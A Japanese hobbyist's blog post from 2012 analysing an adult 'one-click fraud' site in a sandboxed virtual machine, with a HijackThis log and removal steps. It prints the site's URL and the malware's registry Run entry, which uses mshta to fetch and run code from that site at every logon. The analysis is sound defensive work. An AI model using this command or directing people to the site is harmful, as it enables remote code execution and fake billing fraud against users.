?原点回帰? 懐かしきワンクリサイト ADULT COLLECTION

【スポンサーリンク】

皆様、こんばんは。

それでは今回の投稿にまいりましょう。

【スポンサーリンク】

?原点回帰? 懐かしきワンクリサイト ADULT COLLECTION

>ADULT COLLECTION

http://www.oxygen-tank.org/

思えば2年前、知恵袋のセキュカテに初めて参加した時マルウェアに興味を持つきっかけとなったのがワンクリウェアでした。

当時はsasi40さんのツールをご紹介させていただくことだけでした。sasi40さんのサイトを見ながらツールがワンクリサイトに対応しているかどうか確認しながら回答していたものです。hijackthisを初めて知ったのもこの頃です。

初めはログといっても何が書いてあるのかさっぱりわからず・・・。

プロセス? レジストリ?何のことやらチンプンカンプンでしたね・・・。

さて実際にアクセスしてみると・・・

20120501004552aca

動画再生を2回クリックしダウンロード画面で実行をクリック。と・・・、alyacがhtaファイルを検出するも実行をクリックしたので請求画面の表示は阻止できず・・・。残念。以下が請求画面です。

20120501004825d01

昔のADULT COLLECTIONはもっと若い女性の請求画面だったはずなのに・・・。最近のワンクリサイトは本当に・・・

熟女の画像が多い・・・

さてここでhijackthisにてログを取ります。ログは以下です。

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 0:14:16, on 2012/05/01
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Sandboxie\SbieSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Virtual PC Integration Components\vmsrvc.exe
C:\Program Files\ESTsoft\ALYac\AYRTSrv.aye
C:\Program Files\ESTsoft\ALYac\AYUpdSrv.aye
C:\Program Files\Secunia\PSI\PSIA.exe
C:\Program Files\Secunia\PSI\sua.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Virtual PC Integration Components\vmusrvc.exe
C:\program files\estsoft\alyac\AYAgent.aye
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Secunia\PSI\psi_tray.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\conime.exe
C:\WINDOWS\system32\mshta.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Sandboxie\SbieCtrl.exe
C:\Documents and Settings\Administrator\デスクトップ\HijackThis.exe

F2 – REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,rdpinit.exe,
O2 – BHO: G Data CloudSecurity Class – {AADAC261-4EE9-473A-AB95-D8E153424C38} – C:\Program Files\G Data\G Data CloudSecurity\CloudSecurityIE.dll
O2 – BHO: WOT Helper – {C920E44A-7F78-4E64-BDD7-A57026E7FEB7} – C:\Program Files\WOT\WOT.dll
O3 – Toolbar: G Data CloudSecurity – {AADAC261-4EE9-473A-AB95-D8E153424C38} – C:\Program Files\G Data\G Data CloudSecurity\CloudSecurityIE.dll
O3 – Toolbar: WOT – {71576546-354D-41c9-AAE8-31F2EC22BF0D} – C:\Program Files\WOT\WOT.dll
O4 – HKLM\..\Run: [IMJPMIG8.1] “C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE” /Spoil /RemAdvDef /Migration32
O4 – HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 – HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 – HKLM\..\Run: [VMUserServices] C:\Program Files\Virtual PC Integration Components\vmusrvc.exe
O4 – HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
O4 – HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 – HKLM\..\Run: [ALYac] “c:\program files\estsoft\alyac\AYLaunch.exe” /run
O4 – HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 – HKCU\..\Run: [SandboxieControl] “C:\Program Files\Sandboxie\SbieCtrl.exe”
O4 – HKCU\..\Run: [www.adult-collection09.net] mshta http://www.oxygen-tank.org/regist2.php
O4 – HKUS\S-1-5-19\..\Run: [ctfmon.exe] ctfmon.exe (User ‘LOCAL SERVICE’)
O4 – HKUS\S-1-5-20\..\Run: [ctfmon.exe] ctfmon.exe (User ‘NETWORK SERVICE’)
O4 – HKUS\S-1-5-18\..\Run: [ctfmon.exe] ctfmon.exe (User ‘SYSTEM’)
O4 – HKUS\.DEFAULT\..\Run: [ctfmon.exe] ctfmon.exe (User ‘Default user’)
O9 – Extra button: (no name) – {e2e2dd38-d088-4134-82b7-f2ba38496583} – C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 – Extra ‘Tools’ menuitem: @xpsp3res.dll,-20001 – {e2e2dd38-d088-4134-82b7-f2ba38496583} – C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O15 – ESC Trusted Zone: http://*.update.microsoft.com

>O4 – HKCU\..\Run: [www.adult-collection09.net] mshta http://www.oxygen-tank.org/regist2.php

レジストリ登録のみの初期型ワンクリウェアですね。最近ではあまり見かけなくなりましたタイプです。

該当のレジストリをhijackthisよりfixして、タスクマネージャーよりmshta.exeを停止して駆除完了。

今では何も思わなくなってしまいましたが、初めて実際に行った際ははうれしかったものです。

これからも初心を忘れずネットセキュリティに関わっていきたいと思います。